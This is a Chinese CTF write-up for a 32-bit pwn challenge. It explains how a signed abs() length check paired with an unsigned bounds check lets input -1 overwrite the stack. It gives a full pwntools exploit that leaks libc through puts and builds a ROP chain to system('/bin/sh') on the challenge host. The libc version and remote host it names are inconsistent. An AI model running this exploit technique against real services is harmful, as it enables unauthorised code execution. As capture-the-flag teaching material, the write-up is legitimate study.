scanf(“%d“)输入绕过+整数溢出 hackme 详细题解靶机地址https://ctf2.dasctf.com/dashboard/practice/b9bbb32f-f186-458f-b90b-12440c0f6aea?tabchallenges通过网盘分享的文件3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17链接: https://pan.baidu.com/s/1tH7dYlZh64G1lld_9xmBEQ?pwdneuq 提取码: neuq环境是libc-2.23.so(32bit),这个就自己去找一下1. 文件识别与保护机制文件3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17是一个无后缀的 32 位 Linux ELF 可执行文件$ file 3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17 ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped关键保护保护状态说明PIE关闭ELF type 为 ET_EXEC基址固定为0x08048000程序内地址可直接写死Canary无没有导入__stack_chk_fail函数帧中也没有 canary 校验NX开启PT_GNU_STACKflags 6RW无 X栈不可执行RELROPartial.got.plt0x0804c000起仍可写因此本题走“栈溢出 ROP”不需要绕过 canary也不需要处理 PIE。2. IDA 逆向流程用 IDA 打开文件选择 32 位 ELF loader。在 Functions 窗口找到main0x08049408和hackme0x08049216。在hackme上按 F5 得到 Hex-Rays 伪代码或对照反汇编。重点看两个比较长度检查0x08049262cdq; xor eax,edx; sub eax,edx是在算abs(n)。写入检查0x08049310cmp [ebp-0x14], eax; jae是无符号比较。main只做初始化intmain(){setbuf(stdout,0);setbuf(stderr,0);setbuf(stdin,0);hackme();return0;}hackme的逻辑按反汇编还原voidhackme(){intn,choice,i;unsignedintcount0;intsum0;intarr[10];puts(input the length of array:);scanf(%d,n);if(abs(n)10){puts(array is too long!);exit(0);}while(1){puts(\n\n----------------------------------------------------);puts(choice:\n1.add num\n2.get sum\n3.get avg\n4.exit);puts(----------------------------------------------------\n);puts(input your choice:);scanf(%d,choice);if(choice1){if((unsignedint)count(unsignedint)n){puts(input num);scanf(%d,arr[count]);count;}else{puts(array is too long!);exit(0);}}elseif(choice2){sum0;for(i0;icount;i)sumarr[i];printf(sum %d\n,sum);}elseif(choice3){if(count)printf(avg %d\n,sum/count);elseputs(no avg!);}else{puts(exit!);return;}}}3. 漏洞点符号/无符号检查不一致长度检查是有符号的abs(n) 10所以n -1也能通过08049262 mov eax, [ebp-0x1C] ; n 08049265 cdq 08049266 xor eax, edx 08049268 sub eax, edx ; eax abs(n) 0804926A cmp eax, 0xA 0804926D jle short loc_804928B ; abs(n) 10 继续但写入时的检查却是无符号比较0804930D mov eax, [ebp-0x1C] ; n 08049310 cmp [ebp-0x14], eax ; count vs n 08049313 jae short loc_804934E ; (unsigned)count (unsigned)n - 报错退出当n -1时(unsigned int)n 0xFFFFFFFF而count从 0 开始递增永远满足count n。于是“1.add num”可以无限次向栈上连续写入 4 字节整数覆盖返回地址并布置 ROP。写入地址的计算是lea eax, [ebp-0x44] ; arr 基址 shl edx, 2 ; count * 4 add eax, edx ; arr[count]即arr[count]实际写的是ebp - 0x44 count * 4。4. 栈布局与偏移hackme栈帧从ebp-0x44开始布局写入次数相对 ebp内容0…9ebp-0x44…ebp-0x20arr[0]…arr[9]10ebp-0x1Cn11ebp-0x18choice12ebp-0x14count13ebp-0x10i14ebp-0x0Csum15ebp-0x08对齐/未使用16ebp-0x04saved ebx17ebp0x00saved ebp18ebp0x04返回地址19ebp0x08ROP 下一项第一次为 puts 的返回地址20ebp0x0CROP 参数第一次为 puts 的参数也就是说第 19 次add num写入的就是hackme的返回地址之后继续写入的内容会组成 ROP 链。5. 利用思路固定地址无 PIE已从 IDA/ELF 确认符号地址putsplt0x080490C0putsgot0x0804C014hackme0x08049216main0x08049408流程第一次溢出把返回地址改成putsplt栈上依次放main和putsgot执行puts(putsgot)泄漏 libc 中puts的真实地址然后回到main重新进入hackme。BUUCTF 远程使用固定的 libc6-i386 2.27直接按固定偏移计算libc_base puts_addr - 0x67560system libc_base 0x3cf10/bin/sh libc_base 0x17b9db。第二次溢出ROP 到system(/bin/sh)拿到 shell。payload 结构先输入长度-1n保持为 -1。连续add(-)18 次把count从 0 推到 18。scanf(%d)遇到单独的-时会把它作为整数符号前缀消费掉但转换失败、不写入数组count仍会执行因此第 10 个槽位n不会被覆盖。再依次 add 3 个值putsplt、main、putsgot正好落在返回地址、puts 的返回地址、puts 的参数这三个槽位。注意scanf(%d, ...)接收的是有符号十进制整数而地址是 32 位无符号值。大于0x80000000的地址要先转成有符号数再发送addr - 0x100000000等价于struct.pack/struct.unpack的写法。6. 完整 Exploit以下脚本直接面向 BUUCTF 远程node4.buuoj.cn:29862libc6-i386 2.27和write_up.py一致可以直接跑通。本地调试时需要先patchelf绑定题目给的ld-2.27.so和libc-2.27.so并把local改为 1。#!/usr/bin/env python3frompwnimport*context.archi386context.log_leveldebugBIN./pwnpremote(17039d025c2fa987215743cd.tcp-ctf2.dasctf.com,9999,sslTrue)elfELF(BIN)menubinput your choice:\ndefadd(v):p.sendlineafter(menu,b1)p.sendlineafter(binput num\n,v.encode())p.sendlineafter(binput the length of array:\n,b-1)# 18 个 -scanf 消费掉 - 但转换失败不写数组只把 count 推到 18# n 保持 -1之后 3 个值正好是返回地址、下一跳、参数。for_inrange(18):add(-)add(str(elf.plt[puts]))add(str(0x08049408))# mainleak 后干净地重新进入 hackmeadd(str(elf.got[puts]))p.sendlineafter(menu,b4)p.recvline()# exit!leaku32(p.recv(4))puts_addrleak log.success(puts: %#x,puts_addr)libc_baseputs_addr-0x67560systemlibc_base0x3cf10bin_shlibc_base0x17b9dblog.success(libc: %#x, system: %#x, /bin/sh: %#x,libc_base,system,bin_sh)p.sendlineafter(binput the length of array:\n,b-1)for_inrange(18):add(-)add(str(system-0x100000000))add(str(0x08049408))# system 返回后的占位地址无实际作用add(str(bin_sh-0x100000000))p.sendlineafter(menu,b4)p.interactive()运行python3 hackme_writeup.py本地调试时先对二进制做 patchelfpatchelf --set-interpreter ./ld-2.27.so ./3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17 patchelf --add-needed ./libc-2.27.so ./3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b177. 关键点总结漏洞本质是abs(n) 10的有符号长度检查与jae无符号写入检查不一致。传入n -1后(unsigned)n 0xFFFFFFFF边界检查永远不触发获得任意长度的栈连续写。无 canary、无 PIE可以直接覆盖返回地址做 ROP。NX 开启所以不用 shellcode而是先puts(putsgot)泄漏 libc再system(/bin/sh)。填充用 18 个-scanf(%d)消费-但转换失败不覆盖n只推进count。leak 后回main重新进入hackme栈对齐和缓冲状态更干净。

相关新闻

最新新闻

OpenPnP硬件集成:线对板连接器选型、设计与压接工艺全解析

OpenPnP硬件集成:线对板连接器选型、设计与压接工艺全解析

1. 项目概述:为什么“线对板连接器”是OpenPnP与PCB连接的关键 在自动化电子组装领域,OpenPnP作为一个开源的拾取与贴装(Pick and Place)软件,其核心任务是将微小的电子元器件精准地放置到PCB(印刷电路板&a…

2026/8/3 13:59:15
告别繁琐操作:3步掌握TEKLauncher方舟启动器的智能管理技巧

告别繁琐操作:3步掌握TEKLauncher方舟启动器的智能管理技巧

告别繁琐操作:3步掌握TEKLauncher方舟启动器的智能管理技巧 【免费下载链接】TEKLauncher Launcher for ARK: Survival Evolved 项目地址: https://gitcode.com/gh_mirrors/te/TEKLauncher 你是否曾在《方舟:生存进化》中花费数小时手动管理MOD、…

2026/8/3 13:59:15
Arduino三色墨水屏扩展板:低功耗显示与物联网应用实战

Arduino三色墨水屏扩展板:低功耗显示与物联网应用实战

1. 项目概述:当Arduino遇见三色墨水屏如果你玩过Arduino,大概率会对那些单色、刷新慢、显示内容有限的LCD或OLED屏感到一丝审美疲劳。而如果你接触过电子墨水屏(E-ink),又可能被其复杂的驱动时序、高压电源需求以及相对…

2026/8/3 13:59:15
基于LoRa的Meshtastic去中心化通信:从Wio Tracker 1110硬件到Mesh网络实战

基于LoRa的Meshtastic去中心化通信:从Wio Tracker 1110硬件到Mesh网络实战

1. 从零开始认识 Meshtastic:它到底是什么,能解决什么问题?如果你最近在折腾物联网或者对去中心化通信感兴趣,大概率已经听过 Meshtastic 这个名字了。简单来说,Meshtastic 是一个开源的、基于 LoRa(远距离…

2026/8/3 13:59:15
如何用3分钟告别网页收藏混乱?MarkDownload让你的知识管理更高效

如何用3分钟告别网页收藏混乱?MarkDownload让你的知识管理更高效

如何用3分钟告别网页收藏混乱?MarkDownload让你的知识管理更高效 【免费下载链接】markdownload A Firefox and Google Chrome extension to clip websites and download them into a readable markdown file. 项目地址: https://gitcode.com/gh_mirrors/ma/markd…

2026/8/3 13:59:15
为A203载板刷写JetPack:驱动适配与系统部署完整指南

为A203载板刷写JetPack:驱动适配与系统部署完整指南

1. 项目缘起:为什么需要为A203载板刷写JetPack?如果你手头有一块英伟达的Jetson Nano或者Xavier NX核心模块,并且打算把它装进A203这款载板里来用,那么“刷系统”这件事,就是你绕不开的第一步。这听起来可能有点技术门…

2026/8/3 13:54:15